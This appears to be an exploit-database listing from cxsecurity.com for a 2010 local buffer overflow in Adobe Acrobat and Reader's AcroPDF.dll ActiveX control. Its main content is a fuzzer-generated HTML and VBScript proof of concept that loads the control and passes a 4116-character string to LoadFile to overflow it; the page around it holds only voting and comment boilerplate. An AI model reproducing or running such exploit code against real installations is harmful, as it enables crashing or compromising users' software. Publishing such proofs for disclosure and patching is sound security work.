Adobe Acrobat and Reader 9.0 Local Buffer Overflow Exploit (AcroPDF.dll)

2010.10.13
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

<html> Test Exploit page <object classid='clsid:CA8A9780-280D-11CF-A24D-444553540000' id='target' ></object> <script language='vbscript'> 'File Generated by COMRaider v0.0.133 - http://labs.idefense.com 'Wscript.echo typename(target) 'for debugging/custom prolog targetFile = "C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroPDF.dll" prototype = "Function LoadFile ( ByVal fileName As String ) As Boolean" memberName = "LoadFile" progid = "AcroPDFLib.AcroPDF" argCount = 1 arg1=String(4116, "A") target.LoadFile arg1 </script>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top